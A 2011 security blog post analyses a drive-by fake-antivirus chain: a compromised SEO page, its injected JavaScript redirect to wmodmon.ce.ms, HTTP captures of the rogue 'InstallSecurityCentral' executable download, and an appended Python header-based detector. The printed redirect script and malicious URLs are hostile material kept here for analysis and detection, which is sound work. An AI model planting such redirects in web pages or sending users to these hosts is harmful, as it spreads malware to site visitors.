Friday, June 10, 2011

Standard SEO with a dash of driveby

Web path:
http://compromisedsite.com/casseroles-how-to-write-a-letter-of-congratulations-on-high/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==
http://wmodmon.ce.ms/ <- lots of fake AV gifs/pngs/jpgs
http://wmodmon.ce.ms/ <- the naughty exe


Here's the script that was hosted on compromisedsite.com (reflowed for readability; the original was a single line):
var url = "http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==";  // fake AV landing page
function goToOtherPlace() {
    if (window != top) {
        top.location.href = url;    // page is framed: redirect the top-level window
    } else {
        document.location = url;    // not framed: redirect this document
    }
}
window.setTimeout(goToOtherPlace, 10);  // fires 10 ms after the script loads



This httpry output shows wmodmon.ce.ms as the referrer for the jQuery request:
ajax.googleapis.com /ajax/libs/jquery/1.4.2/jquery.min.js http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw== - -

Sanitized headers of the jquery.min.js GET:
GET /ajax/libs/jquery/1.4.2/jquery.min.js HTTP/1.1
Host: ajax.googleapis.com
Accept: */*
Referer: http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 15 Feb 2010 23:30:12 GMT
Date: Wed, 08 Jun 2011 09:19:23 GMT
Expires: Thu, 07 Jun 2012 09:19:23 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 40917
Transfer-Encoding: chunked


Sanitized headers of the exe GET:
GET / HTTP/1.1
Host: wmodmon.ce.ms
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Disposition: attachment; filename="InstallSecurityCentral_477.exe"
Content-Type: application/force-download
Date: Wed, 08 Jun 2011 21:42:02 GMT
Server: Apache
Content-Length: 287440


MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
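A detection pass over the two exchanges above, added here as my own example (not code from the post): it parses the sanitized header blocks and flags what marks the last exchange as an executable drop, namely an attachment with a .exe filename, a force-download content type, a request for the site root answered with a binary, and a body starting with the MZ stub. The header blocks are copied from the post; the body prefix and the extension/content-type lists are my assumptions.

```python
import re

# Header blocks are copied from the post's sanitized capture; the body
# prefix is a constructed stand-in for the MZ bytes the post shows.
EXE_REQUEST = """GET / HTTP/1.1
Host: wmodmon.ce.ms
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
"""
EXE_RESPONSE = """HTTP/1.1 200 OK
Content-Disposition: attachment; filename="InstallSecurityCentral_477.exe"
Content-Type: application/force-download
Content-Length: 287440
"""
JQ_REQUEST = "GET /ajax/libs/jquery/1.4.2/jquery.min.js HTTP/1.1\nHost: ajax.googleapis.com\n"
JQ_RESPONSE = "HTTP/1.1 200 OK\nContent-Type: text/javascript; charset=UTF-8\n"
EXE_BODY = b"MZ\x90\x00"  # constructed: PE files start with the MZ DOS stub

# Assumed lists: extensions Windows runs directly, and content types that
# force the browser to save the response instead of rendering it.
EXEC_EXT = re.compile(r'\.(exe|scr|com|pif|bat|msi)["\s;]*$', re.I)
BINARY_TYPES = {"application/force-download", "application/octet-stream",
                "application/x-msdownload"}

def parse_headers(raw):
    """Split a raw HTTP header block into (start line, {lower-name: value})."""
    lines = raw.strip().splitlines()
    hdrs = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    return lines[0], hdrs

def driveby_indicators(request, response, body_prefix=b""):
    """Return the executable-drop indicators present in one request/response pair."""
    req_line, _ = parse_headers(request)
    _, resp = parse_headers(response)
    ctype = resp.get("content-type", "").split(";")[0].strip().lower()
    disp = resp.get("content-disposition", "")
    hits = []
    if disp.lower().startswith("attachment") and EXEC_EXT.search(disp):
        hits.append("attachment with executable filename")
    if ctype in BINARY_TYPES:
        hits.append("binary content-type " + ctype)
    # A GET for the site root is a page load; anything but HTML back is odd
    if req_line.split()[1] == "/" and ctype and ctype != "text/html":
        hits.append("site root served " + ctype)
    if body_prefix.startswith(b"MZ"):
        hits.append("body starts with MZ (PE header)")
    return hits
```

The jQuery exchange produces no indicators, while the exe exchange trips all four; in a proxy or sensor the same checks can run over every response whose request was a top-level navigation.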
